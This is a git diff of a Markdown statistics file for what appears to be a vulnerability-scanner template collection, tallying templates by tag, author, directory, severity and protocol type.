+++ b/TEMPLATES-STATS.md @@ -1,602 +1,602 @@ -| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | -|--------------------|-------|--------------------------------------------|-------|-----------|-------|----------|-------|---------|-------| -| cve | 462 | dhiyaneshdk | 202 | home | 1591 | info | 453 | http | 1408 | -| panel | 201 | pdteam | 184 | | | high | 396 | file | 42 | -| xss | 168 | pikpikcu | 177 | | | medium | 312 | network | 32 | -| wordpress | 166 | dwisiswant0 | 113 | | | critical | 186 | dns | 10 | -| rce | 161 | geeknik | 88 | | | low | 150 | | | -| exposure | 154 | daffainfo | 78 | | | | | | | -| cve2020 | 135 | madrobot | 59 | | | | | | | -| lfi | 127 | princechaddha | 50 | | | | | | | -| wp-plugin | 111 | gaurang | 42 | | | | | | | -| cve2019 | 82 | gy741 | 35 | | | | | | | -| config | 81 | ice3man | 26 | | | | | | | -| tech | 72 | pussycat0x | 25 | | | | | | | -| takeover | 71 | 0x_akoko | 20 | | | | | | | -| cve2021 | 70 | organiccrap | 19 | | | | | | | -| token | 63 | sheikhrishad | 15 | | | | | | | -| cve2018 | 61 | milo2012 | 13 | | | | | | | -| apache | 60 | techbrunchfr | 13 | | | | | | | -| default-login | 45 | suman_kar | 12 | | | | | | | -| cve2017 | 43 | pr3r00t | 12 | | | | | | | -| file | 42 | cyllective | 11 | | | | | | | -| unauth | 39 | random_robbie | 10 | | | | | | | -| network | 32 | righettod | 9 | | | | | | | -| iot | 32 | nadino | 8 | | | | | | | -| sqli | 29 | aashiq | 8 | | | | | | | -| oracle | 29 | wdahlenb | 8 | | | | | | | -| workflow | 28 | iamthefrogy | 8 | | | | | | | -| misc | 27 | hackergautam | 8 | | | | | | | -| atlassian | 26 | techryptic (@tech) | 7 | | | | | | | -| jira | 25 | randomstr1ng | 7 | | | | | | | -| ssrf | 25 | emadshanab | 7 | | | | | | | -| oob | 24 | dr_set | 7 | | | | | | | -| disclosure | 24 | melbadry9 | 7 | | | | | | | -| logs | 24 | 0x240x23elu | 7 | | | | | | | -| redirect | 20 | that_juan_ | 7 | | | | | | | -| aem | 18 | r3dg33k | 7 | | | | | | | -| listing | 15 | harshbothra_ | 7 | | | | | | | -| cisco | 15 | oppsec | 7 | | | | | | | -| cve2016 | 14 | philippedelteil | 6 | | | | | | | -| sap | 14 | __fazal | 6 | | | | | | | -| misconfig | 13 | yanyun | 5 | | | | | | | -| debug | 13 | pentest_swissky | 5 | | | | | | | -| cve2015 | 13 | panch0r3d | 5 | | | | | | | -| struts | 13 | ganofins | 5 | | | | | | | -| fuzz | 12 | caspergn | 5 | | | | | | | -| android | 12 | puzzlepeaches | 5 | | | | | | | -| weblogic | 12 | e_schultze_ | 4 | | | | | | | -| springboot | 11 | meme-lord | 4 | | | | | | | -| auth-bypass | 11 | rootxharsh | 4 | | | | | | | -| zoho | 11 | nodauf | 4 | | | | | | | -| dns | 11 | iamnoooob | 4 | | | | | | | -| devops | 10 | github.com/its0x08 | 4 | | | | | | | -| cve2011 | 10 | xelkomy | 4 | | | | | | | -| cve2012 | 9 | kophjager007 | 3 | | | | | | | -| dlink | 9 | yash anand @yashanand155 | 3 | | | | | | | -| jenkins | 9 | fyoorer | 3 | | | | | | | -| magento | 9 | tess | 3 | | | | | | | -| cnvd | 8 | f1tz | 3 | | | | | | | -| php | 8 | joanbono | 3 | | | | | | | -| ftp | 8 | thomas_from_offensity | 3 | | | | | | | -| gitlab | 8 | z3bd | 3 | | | | | | | -| cve2013 | 8 | impramodsargar | 3 | | | | | | | -| aws | 8 | binaryfigments | 3 | | | | | | | -| airflow | 8 | 0w4ys | 3 | | | | | | | -| adobe | 8 | shine | 3 | | | | | | | -| joomla | 7 | bsysop | 2 | | | | | | | -| cve2014 | 7 | afaq | 2 | | | | | | | -| vmware | 7 | incogbyte | 2 | | | | | | | -| scada | 7 | mahendra purbia (mah3sec_) | 2 | | | | | | | -| backup | 6 | zomsop82 | 2 | | | | | | | -| citrix | 6 | 0xprial | 2 | | | | | | | -| api | 6 | moritz nentwig | 2 | | | | | | | -| rconfig | 6 | amsda | 2 | | | | | | | -| cms | 6 | lu4nx | 2 | | | | | | | -| google | 6 | dheerajmadhukar | 2 | | | | | | | -| rails | 6 | foulenzer | 2 | | | | | | | -| xxe | 6 | davidmckennirey | 2 | | | | | | | -| nginx | 6 | ree4pwn | 2 | | | | | | | -| headless | 5 | hetroublemakr | 2 | | | | | | | -| jetty | 5 | joeldeleep | 2 | | | | | | | -| phpmyadmin | 5 | vavkamil | 2 | | | | | | | -| ruijie | 5 | elsfa7110 | 2 | | | | | | | -| lucee | 5 | mavericknerd | 2 | | | | | | | -| confluence | 5 | kiblyn11 | 2 | | | | | | | -| drupal | 5 | 0xcrypto | 2 | | | | | | | -| java | 5 | ehsahil | 2 | | | | | | | -| ssti | 5 | emenalf | 2 | | | | | | | -| iis | 5 | lotusdll | 2 | | | | | | | -| login | 5 | manas_harsh | 2 | | | | | | | -| circarlife | 5 | 0xrudra | 2 | | | | | | | -| solr | 5 | pxmme1337 | 2 | | | | | | | -| laravel | 5 | udit_thakkur | 2 | | | | | | | -| dell | 5 | swissky | 2 | | | | | | | -| cve2009 | 4 | bp0lr | 2 | | | | | | | -| thinkphp | 4 | jarijaas | 2 | | | | | | | -| nodejs | 4 | 0xelkomy | 2 | | | | | | | -| solarwinds | 4 | unstabl3 | 2 | | | | | | | -| samsung | 4 | gevakun | 2 | | | | | | | -| elastic | 4 | shifacyclewala | 2 | | | | | | | -| fileupload | 4 | 0xsapra | 2 | | | | | | | -| django | 4 | random-robbie | 2 | | | | | | | -| ibm | 4 | randomrobbie | 2 | | | | | | | -| router | 4 | x1m_martijn | 2 | | | | | | | -| jolokia | 4 | _generic_human_ | 1 | | | | | | | -| webserver | 4 | fabaff | 1 | | | | | | | -| netgear | 4 | aceseven (digisec360) | 1 | | | | | | | -| docker | 4 | yashgoti | 1 | | | | | | | -| magmi | 4 | dudez | 1 | | | | | | | -| moodle | 4 | d0rkerdevil | 1 | | | | | | | -| hongdian | 4 | ringo | 1 | | | | | | | -| traversal | 4 | streetofhackerr007 (rohit | 1 | | | | | | | -| | | soni) | | | | | | | | -| artifactory | 4 | sushant kamble | 1 | | | | | | | -| | | (https://in.linkedin.com/in/sushantkamble) | | | | | | | | -| vpn | 4 | knassar702 | 1 | | | | | | | -| thinkcmf | 4 | soyelmago | 1 | | | | | | | -| asp | 4 | defr0ggy | 1 | | | | | | | -| tomcat | 4 | ajaysenr | 1 | | | | | | | -| r-seenet | 3 | co0nan | 1 | | | | | | | -| mongodb | 3 | toufik airane | 1 | | | | | | | -| kubernetes | 3 | th3.d1p4k | 1 | | | | | | | -| windows | 3 | alifathi-h1 | 1 | | | | | | | -| slack | 3 | akash.c | 1 | | | | | | | -| nosqli | 3 | divya_mudgal | 1 | | | | | | | -| amazon | 3 | 52971 | 1 | | | | | | | -| bypass | 3 | b4uh0lz | 1 | | | | | | | -| microstrategy | 3 | kurohost | 1 | | | | | | | -| openssh | 3 | sy3omda | 1 | | | | | | | -| vbulletin | 3 | raesene | 1 | | | | | | | -| backups | 3 | _c0wb0y_ | 1 | | | | | | | -| ofbiz | 3 | notsoevilweasel | 1 | | | | | | | -| springcloud | 3 | ooooooo_q | 1 | | | | | | | -| printer | 3 | mubassirpatel | 1 | | | | | | | -| kafka | 3 | mhdsamx | 1 | | | | | | | -| fanruan | 3 | thezakman | 1 | | | | | | | -| deserialization | 3 | smaranchand | 1 | | | | | | | -| fpd | 3 | rtcms | 1 | | | | | | | -| terramaster | 3 | naglinagli | 1 | | | | | | | -| git | 3 | ipanda | 1 | | | | | | | -| dedecms | 3 | koti2 | 1 | | | | | | | -| ebs | 3 | yavolo | 1 | | | | | | | -| grafana | 3 | whynotke | 1 | | | | | | | -| ssh | 3 | mohammedsaneem | 1 | | | | | | | -| caucho | 3 | rodnt | 1 | | | | | | | -| resin | 3 | affix | 1 | | | | | | | -| nacos | 3 | ldionmarcil | 1 | | | | | | | -| lfr | 3 | _harleo | 1 | | | | | | | -| log | 3 | wabafet | 1 | | | | | | | -| crlf | 3 | vsh00t | 1 | | | | | | | -| oa | 3 | ivo palazzolo (@palaziv) | 1 | | | | | | | -| prometheus | 2 | manikanta a.k.a @secureitmania | 1 | | | | | | | -| hjtcloud | 2 | r3naissance | 1 | | | | | | | -| telerik | 2 | streetofhackerr007 | 1 | | | | | | | -| ucmdb | 2 | s1r1u5_ | 1 | | | | | | | -| nextjs | 2 | shifacyclewla | 1 | | | | | | | -| strapi | 2 | yashanand155 | 1 | | | | | | | -| ecology | 2 | taielab | 1 | | | | | | | -| hp | 2 | becivells | 1 | | | | | | | -| flir | 2 | kishore krishna (sillydaddy) | 1 | | | | | | | -| globalprotect | 2 | shreyapohekar | 1 | | | | | | | -| rstudio | 2 | micha3lb3n | 1 | | | | | | | -| wordfence | 2 | bad5ect0r | 1 | | | | | | | -| yapi | 2 | hanlaomo | 1 | | | | | | | -| bitrix | 2 | fopina | 1 | | | | | | | -| sonicwall | 2 | alperenkesk | 1 | | | | | | | -| openfire | 2 | alph4byt3 | 1 | | | | | | | -| keycloak | 2 | regala_ | 1 | | | | | | | -| couchdb | 2 | andirrahmani1 | 1 | | | | | | | -| sharepoint | 2 | gboddin | 1 | | | | | | | -| intrusive | 2 | its0x08 | 1 | | | | | | | -| plesk | 2 | noamrathaus | 1 | | | | | | | -| mida | 2 | 0h1in9e | 1 | | | | | | | -| activemq | 2 | manuelbua | 1 | | | | | | | -| showdoc | 2 | flag007 | 1 | | | | | | | -| microsoft | 2 | shelld3v | 1 | | | | | | | -| nagios | 2 | aaron_costello | 1 | | | | | | | -| | | (@conspiracyproof) | | | | | | | | -| voipmonitor | 2 | qlkwej | 1 | | | | | | | -| frp | 2 | luci | 1 | | | | | | | -| idrac | 2 | deena | 1 | | | | | | | -| saltstack | 2 | bjhulst | 1 | | | | | | | -| sonarqube | 2 | omarkurt | 1 | | | | | | | -| vrealize | 2 | berkdusunur | 1 | | | | | | | -| spark | 2 | tirtha_mandal | 1 | | | | | | | -| smtp | 2 | 0xrod | 1 | | | | | | | -| chamilo | 2 | furkansenan | 1 | | | | | | | -| injection | 2 | pdp | 1 | | | | | | | -| maian | 2 | dogasantos | 1 | | | | | | | -| cache | 2 | luskabol | 1 | | | | | | | -| icewarp | 2 | apt-mirror | 1 | | | | | | | -| service | 2 | iampritam | 1 | | | | | | | -| waf | 2 | ohlinge | 1 | | | | | | | -| natshell | 2 | sid ahmed malaoui @ realistic | 1 | | | | | | | -| | | security | | | | | | | | -| paloalto | 2 | rojanrijal | 1 | | | | | | | -| nexus | 2 | ahmed sherif | 1 | | | | | | | -| bigip | 2 | johnjhacking | 1 | | | | | | | -| seeyon | 2 | arcc | 1 | | | | | | | -| webcam | 2 | hakluke | 1 | | | | | | | -| proxy | 2 | thevillagehacker | 1 | | | | | | | -| smb | 2 | kareemse1im | 1 | | | | | | | -| hpe | 2 | abison_binoy | 1 | | | | | | | -| mail | 2 | tim_koopmans | 1 | | | | | | | -| kibana | 2 | sshell | 1 | | | | | | | -| exposures | 2 | g4l1t0 and @convisoappsec | 1 | | | | | | | -| emerge | 2 | jeya seelan | 1 | | | | | | | -| leak | 2 | alex | 1 | | | | | | | -| xxljob | 2 | 0xtavian | 1 | | | | | | | -| openam | 2 | kabirsuda | 1 | | | | | | | -| huawei | 2 | nkxxkn | 1 | | | | | | | -| glassfish | 2 | bolli95 | 1 | | | | | | | -| coldfusion | 2 | schniggie | 1 | | | | | | | -| zhiyuan | 2 | 0ut0fb4nd | 1 | | | | | | | -| fortios | 2 | gal nagli | 1 | | | | | | | -| zabbix | 2 | sicksec | 1 | | | | | | | -| pega | 2 | juicypotato1 | 1 | | | | | | | -| dos | 2 | _darrenmartyn | 1 | | | | | | | -| hashicorp | 2 | fmunozs | 1 | | | | | | | -| httpd | 2 | @github.com/defr0ggy | 1 | | | | | | | -| shellshock | 2 | cookiehanhoan | 1 | | | | | | | -| jboss | 2 | absshax | 1 | | | | | | | -| splunk | 2 | dawid czarnecki | 1 | | | | | | | -| odoo | 2 | idealphase | 1 | | | | | | | -| cve2008 | 2 | sickwell | 1 | | | | | | | -| rockmongo | 2 | zandros0 | 1 | | | | | | | -| jellyfin | 2 | undefl0w | 1 | | | | | | | -| kentico | 2 | daviey | 1 | | | | | | | -| oauth | 2 | exploitation | 1 | | | | | | | -| rockethchat | 2 | j33n1k4 | 1 | | | | | | | -| trixbox | 2 | remonsec | 1 | | | | | | | -| rdp | 1 | nytr0gen | 1 | | | | | | | -| jfrog | 1 | j3ssie/geraldino2 | 1 | | | | | | | -| geutebruck | 1 | akshansh | 1 | | | | | | | -| robomongo | 1 | chron0x | 1 | | | | | | | -| spring | 1 | zhenwarx | 1 | | | | | | | -| proftpd | 1 | willd96 | 1 | | | | | | | -| ueditor | 1 | ratnadip gajbhiye | 1 | | | | | | | -| ec2 | 1 | bing0o | 1 | | | | | | | -| szhe | 1 | elmahdi | 1 | | | | | | | -| nps | 1 | w4cky_ | 1 | | | | | | | -| axis | 1 | pudsec | 1 | | | | | | | -| zzzcms | 1 | c3l3si4n | 1 | | | | | | | -| blue-ocean | 1 | mah3sec_ | 1 | | | | | | | -| viewlinc | 1 | geraldino2 | 1 | | | | | | | -| kubeflow | 1 | kba@sogeti_esec | 1 | | | | | | | -| wooyun | 1 | patralos | 1 | | | | | | | -| tika | 1 | sullo | 1 | | | | | | | -| rmi | 1 | johnk3r | 1 | | | | | | | -| ilo4 | 1 | @dwisiswant0 | 1 | | | | | | | -| springframework | 1 | ilovebinbash | 1 | | | | | | | -| zmanda | 1 | blckraven | 1 | | | | | | | -| yachtcontrol | 1 | vzamanillo | 1 | | | | | | | -| jquery | 1 | | | | | | | | | -| rujjie | 1 | | | | | | | | | -| nuuo | 1 | | | | | | | | | -| db | 1 | | | | | | | | | -| webmodule-ee | 1 | | | | | | | | | -| tamronos | 1 | | | | | | | | | -| salesforce | 1 | | | | | | | | | -| netrc | 1 | | | | | | | | | -| vscode | 1 | | | | | | | | | -| cve2007 | 1 | | | | | | | | | -| mpsec | 1 | | | | | | | | | -| itop | 1 | | | | | | | | | -| openrestry | 1 | | | | | | | | | -| bitly | 1 | | | | | | | | | -| mdb | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| soar | 1 | | | | | | | | | -| timeclock | 1 | | | | | | | | | -| ssltls | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| hasura | 1 | | | | | | | | | -| livezilla | 1 | | | | | | | | | -| node | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| jnoj | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| haproxy | 1 | | | | | | | | | -| htmli | 1 | | | | | | | | | -| opm | 1 | | | | | | | | | -| webmin | 1 | | | | | | | | | -| weiphp | 1 | | | | | | | | | -| netsweeper | 1 | | | | | | | | | -| klog | 1 | | | | | | | | | -| xml | 1 | | | | | | | | | -| erp-nc | 1 | | | | | | | | | -| webadmin | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| emby | 1 | | | | | | | | | -| mobileiron | 1 | | | | | | | | | -| linkerd | 1 | | | | | | | | | -| ecom | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| nomad | 1 | | | | | | | | | -| gitlist | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| sqlite | 1 | | | | | | | | | -| enumeration | 1 | | | | | | | | | -| panabit | 1 | | | | | | | | | -| biometrics | 1 | | | | | | | | | -| plone | 1 | | | | | | | | | -| interlib | 1 | | | | | | | | | -| keenetic | 1 | | | | | | | | | -| zimbra | 1 | | | | | | | | | -| flink | 1 | | | | | | | | | -| mautic | 1 | | | | | | | | | -| revision | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| domxss | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| shopware | 1 | | | | | | | | | -| exchange | 1 | | | | | | | | | -| wso2 | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| status | 1 | | | | | | | | | -| goahead | 1 | | | | | | | | | -| wildfly | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| opensns | 1 | | | | | | | | | -| centos | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| wp-theme | 1 | | | | | | | | | -| huijietong | 1 | | | | | | | | | -| doh | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| rfi | 1 | | | | | | | | | -| cve2005 | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| backdoor | 1 | | | | | | | | | -| azure | 1 | | | | | | | | | -| bruteforce | 1 | | | | | | | | | -| clockwatch | 1 | | | | | | | | | -| druid | 1 | | | | | | | | | -| heroku | 1 | | | | | | | | | -| octoprint | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| nedi | 1 | | | | | | | | | -| wifisky | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| viewpoint | 1 | | | | | | | | | -| jsf | 1 | | | | | | | | | -| zeroshell | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| ns | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| primetek | 1 | | | | | | | | | -| powercreator | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| thinkadmin | 1 | | | | | | | | | -| synnefo | 1 | | | | | | | | | -| razor | 1 | | | | | | | | | -| krweb | 1 | | | | | | | | | -| smartsense | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| xdcms | 1 | | | | | | | | | -| tongda | 1 | | | | | | | | | -| sprintful | 1 | | | | | | | | | -| zookeeper | 1 | | | | | | | | | -| akamai | 1 | | | | | | | | | -| duomicms | 1 | | | | | | | | | -| opensmtpd | 1 | | | | | | | | | -| adminer | 1 | | | | | | | | | -| darkstat | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| acexy | 1 | | | | | | | | | -| nexusdb | 1 | | | | | | | | | -| lansweeper | 1 | | | | | | | | | -| netis | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| comodo | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| mcafee | 1 | | | | | | | | | -| dom | 1 | | | | | | | | | -| targa | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| visionhub | 1 | | | | | | | | | -| igs | 1 | | | | | | | | | -| tapestry | 1 | | | | | | | | | -| b2evolution | 1 | | | | | | | | | -| openstack | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| tensorboard | 1 | | | | | | | | | -| npm | 1 | | | | | | | | | -| ssl | 1 | | | | | | | | | -| fortigate | 1 | | | | | | | | | -| eyou | 1 | | | | | | | | | -| kerbynet | 1 | | | | | | | | | -| opentsdb | 1 | | | | | | | | | -| javafaces | 1 | | | | | | | | | -| zarafa | 1 | | | | | | | | | -| socomec | 1 | | | | | | | | | -| skywalking | 1 | | | | | | | | | -| symfony | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| circontrorl | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| moinmoin | 1 | | | | | | | | | -| ambari | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| phpinfo | 1 | | | | | | | | | -| horde | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| acme | 1 | | | | | | | | | -| grav | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| idemia | 1 | | | | | | | | | -| pacsone | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| jsp | 1 | | | | | | | | | -| servicenow | 1 | | | | | | | | | -| dompdf | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| xff | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| geddy | 1 | | | | | | | | | -| fedora | 1 | | | | | | | | | -| episerver | 1 | | | | | | | | | -| ems | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| wamp | 1 | | | | | | | | | -| payara | 1 | | | | | | | | | -| wiki | 1 | | | | | | | | | -| diris | 1 | | | | | | | | | -| selea | 1 | | | | | | | | | -| jitsi | 1 | | | | | | | | | -| upload | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| sitecore | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| k8 | 1 | | | | | | | | | -| clave | 1 | | | | | | | | | -| sidekiq | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| fortinet | 1 | | | | | | | | | -| redhat | 1 | | | | | | | | | -| postgres | 1 | | | | | | | | | -| grails | 1 | | | | | | | | | -| fiori | 1 | | | | | | | | | -| myucms | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| mongoshake | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| mediumish | 1 | | | | | | | | | -| ntopng | 1 | | | | | | | | | -| zend | 1 | | | | | | | | | -| ricoh | 1 | | | | | | | | | -| mailchimp | 1 | | | | | | | | | -| lancom | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| 74cms | 1 | | | | | | | | | -| dlogin | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| jenzabar | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| etouch | 1 | | | | | | | | | -| firebase | 1 | | | | | | | | | -| vsftpd | 1 | | | | | | | | | -| fastcgi | 1 | | | | | | | | | -| phalcon | 1 | | | | | | | | | -| redwood | 1 | | | | | | | | | -| blind | 1 | | | | | | | | | -| linkedin | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| ulterius | 1 | | | | | | | | | -| liferay | 1 | | | | | | | | | -| wazuh | 1 | | | | | | | | | -| zenario | 1 | | | | | | | | | -| postmessage | 1 | | | | | | | | | -| gogs | 1 | | | | | | | | | -| moin | 1 | | | | | | | | | -| swagger | 1 | | | | | | | | | -| discourse | 1 | | | | | | | | | -| varnish | 1 | | | | | | | | | -| stem | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| rmc | 1 | | | | | | | | | -| mara | 1 | | | | | | | | | -| ruby | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| apiman | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| wuzhicms | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| sarg | 1 | | | | | | | | | -| bookstack | 1 | | | | | | | | | -| timesheet | 1 | | | | | | | | | -| kong | 1 | | | | | | | | | -| triconsole | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| pgadmin | 1 | | | | | | | | | -| jmx | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| enum | 1 | | | | | | | | | -| bolt | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| aspnuke | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| spidercontrol | 1 | | | | | | | | | -| openerp | 1 | | | | | | | | | -| pippoint | 1 | | | | | | | | | -| kyan | 1 | | | | | | | | | -| lanproxy | 1 | | | | | | | | | -| fortiweb | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| tensorflow | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| cse | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| zm | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| xunchi | 1 | | | | | | | | | -| javascript | 1 | | | | | | | | | -| plugin | 1 | | | | | | | | | -| finereport | 1 | | | | | | | | | -| cors | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| servicedesk | 1 | | | | | | | | | -| codeigniter | 1 | | | | | | | | | -| harbor | 1 | | | | | | | | | -| subrion | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| zte | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| mirai | 1 | | | | | | | | | -| yii | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| aura | 1 | | | | | | | | | -| tenda | 1 | | | | | | | | | -| tileserver | 1 | | | | | | | | | -| redis | 1 | | | | | | | | | -| zcms | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| shopxo | 1 | | | | | | | | | -| nuxeo | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| octobercms | 1 | | | | | | | | | -| nordex | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| anchorcms | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| node-red-dashboard | 1 | | | | | | | | | -| wmt | 1 | | | | | | | | | -| webui | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| panos | 1 | | | | | | | | | -| javamelody | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| kafdrop | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| flash | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| bash | 1 | | | | | | | | | -| upnp | 1 | | | | | | | | | -| embedthis | 1 | | | | | | | | | -| discord | 1 | | | | | | | | | -| svn | 1 | | | | | | | | | -| memcached | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| email | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| optiLink | 1 | | | | | | | | | -| feifeicms | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| cve2010 | 1 | | | | | | | | | -| cobub | 1 | | | | | | | | | -| avtech | 1 | | | | | | | | | -| avalanche | 1 | | | | | | | | | -| landrayoa | 1 | | | | | | | | | -| csrf | 1 | | | | | | | | | -| plastic | 1 | | | | | | | | | -| pyramid | 1 | | | | | | | | | -| fortigates | 1 | | | | | | | | | -| 2014 | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| favicon | 1 | | | | | | | | | -| dvwa | 1 | | | | | | | | | -| dotnetnuke | 1 | | | | | | | | | -| svnserve | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| alerta | 1 | | | | | | | | | +| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | +|--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| +| cve | 462 | dhiyaneshdk | 202 | cves | 468 | info | 453 | http | 1408 | +| panel | 201 | pdteam | 184 | vulnerabilities | 234 | high | 396 | file | 42 | +| xss | 168 | pikpikcu | 177 | exposed-panels | 202 | medium | 312 | network | 32 | +| wordpress | 166 | dwisiswant0 | 113 | exposures | 150 | critical | 186 | dns | 10 | +| rce | 161 | geeknik | 88 | technologies | 129 | low | 150 | | | +| exposure | 154 | daffainfo | 78 | misconfiguration | 114 | | | | | +| cve2020 | 135 | madrobot | 59 | takeovers | 70 | | | | | +| lfi | 127 | princechaddha | 50 | default-logins | 44 | | | | | +| wp-plugin | 111 | gaurang | 42 | file | 42 | | | | | +| cve2019 | 82 | gy741 | 35 | workflows | 33 | | | | | +| config | 81 | ice3man | 26 | miscellaneous | 27 | | | | | +| tech | 72 | pussycat0x | 25 | network | 25 | | | | | +| takeover | 71 | 0x_akoko | 20 | iot | 18 | | | | | +| cve2021 | 70 | organiccrap | 19 | fuzzing | 10 | | | | | +| token | 63 | sheikhrishad | 15 | dns | 10 | | | | | +| cve2018 | 61 | techbrunchfr | 13 | cnvd | 9 | | | | | +| apache | 60 | milo2012 | 13 | headless | 5 | | | | | +| default-login | 45 | pr3r00t | 12 | .pre-commit-config.yaml | 1 | | | | | +| cve2017 | 43 | suman_kar | 12 | | | | | | | +| file | 42 | cyllective | 11 | | | | | | | +| unauth | 39 | random_robbie | 10 | | | | | | | +| network | 32 | righettod | 9 | | | | | | | +| iot | 32 | aashiq | 8 | | | | | | | +| oracle | 29 | wdahlenb | 8 | | | | | | | +| sqli | 29 | iamthefrogy | 8 | | | | | | | +| workflow | 28 | nadino | 8 | | | | | | | +| misc | 27 | hackergautam | 8 | | | | | | | +| atlassian | 26 | 0x240x23elu | 7 | | | | | | | +| jira | 25 | harshbothra_ | 7 | | | | | | | +| ssrf | 25 | r3dg33k | 7 | | | | | | | +| logs | 24 | techryptic (@tech) | 7 | | | | | | | +| disclosure | 24 | that_juan_ | 7 | | | | | | | +| oob | 24 | emadshanab | 7 | | | | | | | +| redirect | 20 | randomstr1ng | 7 | | | | | | | +| aem | 18 | melbadry9 | 7 | | | | | | | +| listing | 15 | dr_set | 7 | | | | | | | +| cisco | 15 | oppsec | 7 | | | | | | | +| sap | 14 | __fazal | 6 | | | | | | | +| cve2016 | 14 | philippedelteil | 6 | | | | | | | +| debug | 13 | ganofins | 5 | | | | | | | +| misconfig | 13 | yanyun | 5 | | | | | | | +| cve2015 | 13 | pentest_swissky | 5 | | | | | | | +| struts | 13 | caspergn | 5 | | | | | | | +| android | 12 | puzzlepeaches | 5 | | | | | | | +| weblogic | 12 | panch0r3d | 5 | | | | | | | +| fuzz | 12 | meme-lord | 4 | | | | | | | +| dns | 11 | github.com/its0x08 | 4 | | | | | | | +| auth-bypass | 11 | e_schultze_ | 4 | | | | | | | +| zoho | 11 | nodauf | 4 | | | | | | | +| springboot | 11 | xelkomy | 